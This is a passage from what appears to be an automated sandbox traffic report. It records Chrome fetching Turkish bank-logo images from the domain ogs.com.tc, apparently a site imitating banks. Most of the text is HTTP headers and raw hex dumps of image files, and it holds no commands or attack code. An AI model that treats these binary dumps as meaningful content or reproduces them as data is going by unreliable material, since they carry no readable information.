06 39 8f 3f ab 33 da 4e 29 14 09 0b d3 4b b3 2a da 3a 6a 1c fb c5 da c9 2b 3d 90 31
    Data Ascii: e:7h94sj<Bgkn7mvS)$(0&L$Xr<MS,#w~9 {-GB[9f1 gc"fGVgi03 S3!"4,4,` 1X9?3N)K*:j+=1
    2024-05-25 22:18:10 UTC3786INData Raw: 48 ec 12 90 4d 73 8a cb 9f 61 f8 3a 68 d9 ea 80 c1 76 9b 25 bd b6 00 66 e9 19 ce 30 a3 39 f5 bc b3 a8 b0 8d 18 47 b1 b7 b2 98 df 94 b2 40 b4 5d 68 8c 4a e8 a8 08 cd 08 c7 b0 e3 3e 40 a4 95 9c db e0 b4 76 f9 3d 55 1c ce d5 3d 65 ed 14 e3 57 d8 c5 52 0d 5c 19 02 64 80 3b d3 30 dc e1 18 6a d7 8d ce 63 9a e5 b3 f6 17 c9 d7 4a e9 70 07 77 b5 f6 f1 3e c2 42 2b 8f 5e df 56 df 77 c6 11 dc 47 a3 9e 48 0e 53 df d6 8d ad 7b 94 2e b3 47 3d ac 0c 71 f8 f6 a1 95 29 a4 a6 66 0e 03 91 b4 10 a3 fa 8e 48 84 bd b5 d1 50 57 59 99 42 9d 1a f9 21 af a6 88 d4 73 ba ab 5a 45 46 f4 ee 77 5f 6a d9 2e 62 8b 4f 61 83 b8 e4 d8 e2 99 53 a0 00 e5 d2 de 68 23 53 5b cd c3 50 59 42 3a 3a 35 84 5b ed d4 6a d8 6e 8a 66 bc 32 bd 7f 48 8c 7b 1e e6 a8 c2 11 b0 41 13 18 21 08 4c 68 c6 21 8d a8
    Data Ascii: HMsa:hv%f09G@]hJ>@v=U=eWR\d;0jcJpw>B+^VwGHS{.G=q)fHPWYB!sZEFw_j.bOaSh#S[PYB::5[jnf2H{A!Lh!


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    12192.168.2.549727185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC592OUTGET /assets/images/banks/ing.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 52012
    Last-Modified: Thu, 23 May 2024 21:37:16 GMT
    Connection: close
    ETag: "664fb70c-cb2c"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC16100INData Raw: ff d8 ff e1 0c 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 34 38 3a 33 36 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:48:36"
    2024-05-25 22:18:10 UTC16384INData Raw: 38 e2 82 e2 84 ca 12 5d d0 f0 61 11 3d d1 b6 9a d8 98 9e d4 a7 48 d1 b5 eb d4 27 b2 ea 80 12 5b 60 90 08 82 4c cd 8e e4 c8 ba 5c 0a 02 92 97 00 24 ff 00 ca ed 76 2c 21 85 f1 ce 51 5f 1d 4c f2 e3 db 84 6a aa 3a 17 99 40 d3 98 15 4a 6f 44 a2 b6 e9 fe 25 c1 d6 a0 68 69 9c 96 dd d9 36 6b cb f7 a0 ee 1e db 09 5f 59 db a3 89 05 f2 2f 2d 7a ce d9 a9 cd 08 14 71 27 64 59 b4 5f 1a 0e 45 02 1e e8 cb cc 68 85 a9 14 c6 12 da 9b f3 c8 5b 55 4e 02 95 52 b4 aa 20 5d 5e 85 d4 8f 25 75 66 91 a3 11 ea bf 3c 04 f4 ea 6b 12 bd a9 72 ad 15 d7 1f 44 7d 21 2a 0e 55 23 13 b7 96 3f ef 6e e5 cb 37 07 66 62 16 aa 1b a6 60 d5 94 dd 34 8f 1d 68 a1 d6 28 4d 52 b9 4c 11 0d 0f 73 a5 3f b1 f0 95 ec 91 46 dc f1 c7 3c 3c 62 99 cd 08 5e b1 22 5b 7c 3a b7 82 b2 0d a6 9f ed ea 53 ae 3a f6 29
    Data Ascii: 8]a=H'[`L\$v,!Q_Lj:@JoD%hi6k_Y/-zq'dY_Eh[UNR ]^%uf<krD}!*U#?n7fb`4h(MRLs?F<<b^"[|:S:)
    2024-05-25 22:18:10 UTC16384INData Raw: 98 64 47 44 62 bd d0 bb 66 4b d0 ea 7b c1 ea 49 62 c4 72 43 29 af f0 d3 a5 81 fe 1e 1a 32 91 47 61 91 51 d4 99 51 62 0a 90 64 50 07 1a 7e 87 b5 f4 98 6b b8 a9 4a 93 4a 42 0b 36 93 4f 80 57 ab f1 32 00 a6 79 21 87 11 8e 03 28 66 38 00 78 ed 6e fd db 75 d6 c7 62 f5 2d 52 ee 8f ac 4f 24 44 be 9b 6a 0b 8d 5a 1d 40 c9 16 67 8a bb b2 b0 26 40 6b 98 d5 7a 9d 39 24 46 0d 0d 86 db d6 bb 49 62 91 86 c5 69 a3 9d b5 13 33 29 0f 26 72 b2 54 b1 04 84 f4 cd 77 ca 86 13 9b 13 20 c5 ad 5e 8f 6c b6 99 b7 7e 25 4b c1 a6 69 f2 c9 84 b2 80 bd 5f 84 a9 19 2a b9 57 19 65 08 a3 05 05 8b 39 50 da 78 de 5b 72 b6 a7 45 e1 0f 56 c8 0f 0d 98 e3 90 66 56 86 70 23 9e 35 6c 43 18 9f dc 27 0e a4 58 8c 38 36 e4 d4 77 14 95 0b 72 88 d9 80 27 ac 8c eb 50 39 c0 7f 2b 11 e6 4f 1b bf 44 d3 36
    Data Ascii: dGDbfK{IbrC)2GaQQbdP~kJJB6OW2y!(f8xnub-RO$DjZ@g&@kz9$FIbi3)&rTw ^l~%Ki_*We9Px[rEVfVp#5lC'X86wr'P9+OD6
    2024-05-25 22:18:10 UTC3144INData Raw: ab 48 b5 50 f1 bc 37 a1 7e 4e f9 46 60 3f 32 d9 df 67 a6 e6 f0 59 e8 af 7b 9a 8b 61 a5 da dc 40 81 1d 3c 7e 66 92 df d5 e2 bf 1e db fb 3d b3 cc 2a 8e 4b de 79 0f 4b b6 78 18 f2 9d b5 58 6e 81 9f d3 d8 fa 43 1b 5c 42 91 61 56 3d 11 ad 45 57 2f c9 13 e7 f1 57 7d 43 67 5f 75 47 77 5d 0a de 9a e6 a6 64 7b 1a bb 6a 9b 28 c2 9b 5d 67 5b 61 10 86 8b 3a be 7c 33 30 a1 30 9e e1 94 6f 47 35 55 15 17 ee b2 c6 97 f2 5c 27 bb 0e 67 4f 31 bc 6b ab 49 03 83 12 de 1a 10 d6 05 e5 7d 24 d0 c2 59 96 18 2b b9 a5 23 e2 c8 46 1a 4e 7e c0 ee 99 15 84 11 67 c3 9d b6 e3 5d 8f 19 77 cf 7a 77 3a be 97 9a d9 63 f4 31 db 1e ce 9a da 27 95 ca d5 70 88 68 93 a0 4d 8c 51 c9 87 32 31 4d 0e 7c 33 0a 4c 62 94 05 19 1d ae fd ed 3a b7 f7 07 8f fd bb 7f 6f fd f3 1b 0b 6f cd 37 d5 ae 83 6d 59
    Data Ascii: HP7~NF`?2gY{a@<~f=*KyKxXnC\BaV=EW/W}Cg_uGw]d{j(]g[a:|300oG5U\'gO1kI}$Y+#FN~g]wzw:c1'phMQ21M|3Lb:oo7mY


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    13192.168.2.549728185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC368OUTGET /assets/images/banks/alternatif.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 46102
    Last-Modified: Thu, 23 May 2024 21:37:08 GMT
    Connection: close
    ETag: "664fb704-b416"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC16100INData Raw: ff d8 ff e1 0b f3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 31 39 3a 31 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:19:10"
    2024-05-25 22:18:10 UTC16384INData Raw: d2 2b 42 e1 d1 22 73 68 a6 4a d7 1d b0 e3 9e 68 7f 4e 9f 8a b2 30 89 7c 49 98 c6 31 8b 87 22 29 5d bf f5 4a ac c8 cb 52 32 b9 cf 80 98 65 46 7c 7f af 48 13 33 28 2f e8 e4 41 10 05 58 be 8a d9 97 4e dd 97 38 40 2f 5d fc 81 1c 59 39 a9 ff 00 19 bb 92 6e 5c 73 dc a3 ee 4a d2 69 b7 e5 db fd ee f2 31 da bc f7 2c e5 6d 84 ad 9b 89 b3 d8 a4 d4 6b 9d b6 ea 47 d9 ed 60 87 d6 fe 44 b0 ce e7 1a 66 8b 60 8b 77 28 e1 c5 ad 5a 9f 6b af 6c c7 28 5c 56 9d f8 ef 42 c2 68 6d 6d 04 c9 b1 da 44 6e 5d a3 c6 37 b0 ef 2d eb 0a 7c 83 dd fb c7 d4 6f 62 a7 39 0e 38 7b c1 8f 97 04 85 61 26 ef a4 b5 96 5c 7a 98 ea 90 f7 5b 06 eb 19 dd 61 e4 c7 be 83 9a 1f d3 a7 a1 8b 1e ba a4 6d c3 2a 9d b3 35 44 bb 58 b5 9e 39 d7 be 9c 15 df 66 65 26 44 9b 28 ff 00 a7 24 5d 8e 85 5c cb 1d b9 6a 6a
    Data Ascii: +B"shJhN0|I1")]JR2eF|H3(/AXN8@/]Y9n\sJi1,mkG`Df`w(Zkl(\VBhmmDn]7-|ob98{a&\z[am*5DX9fe&D($]\jj
    2024-05-25 22:18:10 UTC13618INData Raw: 31 1f 27 1a 05 4e e0 2f b3 c2 cf d8 8b c9 5f e5 8e 6f fb 35 22 54 11 14 55 22 55 44 44 44 4e aa aa ab ec 88 89 eb 67 e2 7f 87 5b 4b 1c 8f 00 e5 a7 59 64 f9 2b 96 72 f3 5c 81 a2 e6 bb fa d9 87 0e e6 a3 27 79 0c c6 55 4f 15 d7 4b 8a 6c 24 a8 ae 03 ba 05 43 24 3f a1 50 47 f1 1c 35 c3 d9 0b 1d b7 24 f2 25 f4 6c e6 3b 27 4e 2d a4 ab 4b 49 48 4e 38 e3 d2 1e 26 e2 d7 56 57 44 6d c9 53 e7 48 30 8d 0a 23 2e 3e f1 8b 60 45 ea 93 90 3c 88 a6 cc 79 23 e4 8c 88 71 e5 58 d9 68 ea c2 df 8a f8 ee 79 a9 b8 ed 67 1b e4 ee 63 23 13 9c 8a 24 0d 1d c5 a3 0e 4d 90 4d ab 8c b7 0c 0c 99 f4 cc 38 51 a3 c3 89 1c 11 b6 22 c5 65 b8 f1 d8 6d 3e e0 65 86 44 1a 6c 13 af dc 28 89 fb 8e f7 8c 73 d6 83 0b 90 7c a8 ba 4e 20 a8 06 9e ec 9b 1f 0b f4 e9 6b ca 36 cd 00 aa 3a 51 bf 57 00 2a dc
    Data Ascii: 1'N/_o5"TU"UDDDNg[KYd+r\'yUOKl$C$?PG5$%l;'N-KIHN8&VWDmSH0#.>`E<y#qXhygc#$MM8Q"em>eDl(s|N k6:QW*


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    14192.168.2.549734185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC598OUTGET /assets/images/banks/sekerbank.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 30853
    Last-Modified: Thu, 23 May 2024 21:37:18 GMT
    Connection: close
    ETag: "664fb70e-7885"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC16100INData Raw: ff d8 ff e1 09 6f 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 38 3a 30 35 3a 34 31 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: oExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 18:05:41"
    2024-05-25 22:18:10 UTC14753INData Raw: 79 7e 33 4e 00 62 ad ed 7a ba bd ce 9c 87 af e4 a7 a7 af 05 88 cf e2 1c 3e 5f 3f b8 28 78 63 da 3e 8c 7b 47 d1 8f 68 fa 30 0e ac c7 be 32 f6 7d 58 43 4c c9 a7 a2 bf 17 9a a7 0e 7a f1 c1 4f 9b 19 01 f0 60 93 83 e5 3e bc 32 f0 3f 2f 4f 87 8b 04 74 83 43 eb f0 f9 6b 81 e3 a1 f8 b0 72 19 75 79 fe 3c 7b 23 e0 c2 93 d0 6b e8 23 e3 f7 1b c7 5c 4b f8 a7 03 a8 f8 7a fd c6 c5 7c 67 d6 70 2a d9 f8 86 2a 46 43 ac fb a4 f5 7b 8b e5 18 8f f1 d7 d6 31 c2 bd 3e 1d 7e 2c 07 39 a8 cf ee fc 1e 8c 50 f1 f7 0f 1a e5 d0 71 52 33 f2 1c 7b 3e 83 8f 67 d0 71 ec fa 0e 3d 9f 41 c7 b3 e8 38 ae 9f 7b 75 d7 1c 30 09 14 03 19 70 1e 1e 8f b9 82 3c 79 f9 fa 7e 5f 87 14 e2 bd 1f 26 38 1c 54 8a 66 7d 78 3e 53 eb c0 23 88 f5 74 fc b8 12 2f 1a 7c 23 ee 56 a3 ce 3a 70 ac 33 15 f4 1f 93 8e 2a
    Data Ascii: y~3Nbz>_?(xc>{Gh02}XCLzO`>2?/OtCkruy<{#k#\Kz|gp**FC{1>~,9PqR3{>gq=A8{u0p<y~_&8Tf}x>S#t/|#V:p3*


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    15192.168.2.549733185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC595OUTGET /assets/images/banks/kuveyt.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 4050
    Last-Modified: Thu, 23 May 2024 21:37:17 GMT
    Connection: close
    ETag: "664fb70d-fd2"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC4050INData Raw: 52 49 46 46 ca 0f 00 00 57 45 42 50 56 50 38 20 be 0f 00 00 f0 55 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 95 18 f0 50 09 09 65 6e e1 76 b1 1f d4 dd 7d 13 97 b5 7e 5a 7b 2a 55 3f a9 fe 10 f4 00 fb 00 e9 17 a1 3c b5 bc 4b f3 0f f3 5f dc 3f 28 fe 80 7f 6e fe 81 ec 93 f3 1f ea 4f c0 17 e9 47 f8 ef ee 9e b6 9e a5 3c c0 7f 39 fe cf ff 17 fc 77 ba d7 f8 af d4 df 71 7f b2 1e c0 1f d1 7f c1 ff da f5 8a f6 11 ff 01 ff 5b d8 03 f6 3b ff ff b2 af fb 6f d9 6f 82 6f da bf db 9f 81 1f e7 5f e0 3f ea 7e 7f f7 00 75 13 f4 6b fb 97 6a 3f db ff 24 fa e5 7c d5 ec 67 30 27 a2 fa ef f9 df cc af 61 ff c2 fe 45 79 bf c0 0b d5 ff e0 b7 b4 40 07 e4 ff cf bf d7 7d aa fa 38 7f 2b e8 77 88 07 ea ef fa 7e 35 af 42 f6 03 fe 6f fd cb f5 bb d8 63 fc 9f 2d 7f 4f fe cd fc 09
    Data Ascii: RIFFWEBPVP8 U*>I$F"!!Penv}~Z{*U?<K_?(nOG<9wq[;ooo_?~ukj?$|g0'aEy@}8+w~5Boc-O


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    16192.168.2.549724185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC363OUTGET /assets/images/banks/deniz.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 5774
    Last-Modified: Thu, 23 May 2024 21:37:10 GMT
    Connection: close
    ETag: "664fb706-168e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC5774INData Raw: 52 49 46 46 86 16 00 00 57 45 42 50 56 50 38 20 7a 16 00 00 f0 68 00 9d 01 2a f4 01 c8 00 3e 49 22 8f 45 a2 a2 21 11 58 7c d4 28 04 84 b2 b7 70 bb 00 88 cb 8f f4 bd 84 57 87 c4 7f 6a fd cb f6 b3 b0 bf 74 fc 69 ec cb fb 77 60 f1 a4 eb 0b f6 3f dd bf 76 bf cc 7b f8 ff 4f fd 83 dc d7 e9 0f 60 2f d4 1f f8 3f e0 ff c7 7e b7 f7 3b fd ae f5 05 fa e7 ff 2b fb f7 bb 0f f8 df d9 9f 73 3f b3 df b3 3f 00 1f cd bf d4 75 89 7e e9 7b 07 fe da 7f ff f5 c8 fd b4 f8 4e fe b9 ff 0f f7 03 da 73 ff 07 b0 06 f9 a7 8f ff b3 7e 3e 78 1f fd 57 f2 7b b1 83 d8 9e d3 f3 0c ea 2f 34 bf 8c 7d 74 fc 2f f5 6f da 8f ca 2e 76 78 02 fe 2b fc b7 fc 4f f5 bf da 7f ec 9f b8 7c 95 9a f7 98 17 b2 bf 4e ff 5d f7 07 e9 8f a9 f7 7b 3d 80 bf 99 7f 5a ff 37 eb 9f fa ff 09 2a 00 7f 2e fe e3 ff 23 ee
    Data Ascii: RIFFWEBPVP8 zh*>I"E!X|(pWjtiw`?v{O`/?~;+s??u~{Ns~>xW{/4}t/o.vx+O|N]{=Z7*.#


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    17192.168.2.549725185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC365OUTGET /assets/images/banks/anadolu.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 20736
    Last-Modified: Thu, 23 May 2024 21:37:09 GMT
    Connection: close
    ETag: "664fb705-5100"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC16100INData Raw: ff d8 ff e1 08 61 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 32 30 3a 30 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: aExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:20:05"
    2024-05-25 22:18:10 UTC4636INData Raw: 69 f1 f6 8f 26 d3 0d a9 d8 57 69 aa da ff 00 75 47 4a ac 1d b4 03 11 3e c5 41 cd 1f d9 f6 a2 af f0 fe a6 9f dd 8f 0c ff 00 ba ef bf c5 f1 d3 63 7a 52 48 ba d1 71 5e 6b 67 6d 28 c6 71 cd 32 c8 f9 1a a5 9b 34 e6 72 23 88 69 b2 51 c5 7a af fd 27 af ab 6d 05 ec f8 b5 54 94 55 b3 ae 6e 2d 26 95 a0 85 5b 55 59 14 b3 6c 27 cb 33 fd 9a 18 b0 e2 01 e4 23 97 ec 6b 1a ab ea 26 aa f2 1d 9d b6 03 a9 79 09 63 d4 b4 c0 38 ca f4 a4 f1 cf 91 3d 93 e8 f3 f6 4e 33 4a 90 05 27 01 94 ab cf b5 ee 6a 35 26 ce 1a 7c 51 5e 89 eb 27 e5 9f 34 69 68 45 d9 05 cf fc 86 c2 5f 47 19 99 0e b3 b0 72 9b 1a 8a 5d 54 31 3f d8 6d 24 d8 b6 b9 ca 9b a9 2d 63 95 3d ae 9b ee a9 f2 54 4e 2b e4 36 35 e3 fc b9 d9 39 ae 47 a0 41 8c c2 7d 57 55 97 45 4f 16 6d 95 14 97 fb 22 a4 fc fd a3 cd 06 4b 57 ed
    Data Ascii: i&WiuGJ>AczRHq^kgm(q24r#iQz'mTUn-&[UYl'3#k&yc8=N3J'j5&|Q^'4ihE_Gr]T1?m$-c=TN+659GA}WUEOm"KW


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    18192.168.2.549726185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC353OUTGET /assets/images/1.png HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC281INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/png
    Content-Length: 2220
    Last-Modified: Thu, 23 May 2024 21:37:05 GMT
    Connection: close
    ETag: "664fb701-8ac"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC2220INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a5 00 00 00 28 08 03 00 00 01 df dc fa 78 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 80 50 4c 54 45 ff ff ff fe fb fc fc dd de f8 ba bb f4 9e 9f f1 88 89 ef 78 79 ed 6f 6f ec 69 6a ec 64 65 f4 9b 9c fa d1 d1 fe f0 ef f1 85 86 eb 65 66 f3 94 95 f7 b4 b5 f9 c8 c9 fa cf d0 fa d2 d2 fa ca ca f7 b8 b8 f1 8c 8e e7 4d 4c e0 28 22 e8 53 53 ef 7c 7d e9 54 54 f5 a1 a2 fc d7 d7 fe f6 f6 e2 30 2c df 24 1b fe fc fc ff f9 f9 f6 af af e9 56 57 e7 4a 4a f2 90 92 fc dc dc e2 2e 29 f6 ab ac e6 48 48 fd f3 f2 f2 8e 8f e3 35 32 f8 c2 c3 e8 51 52 e4 37 35 f3 9c 9d fb d3 d4 e0
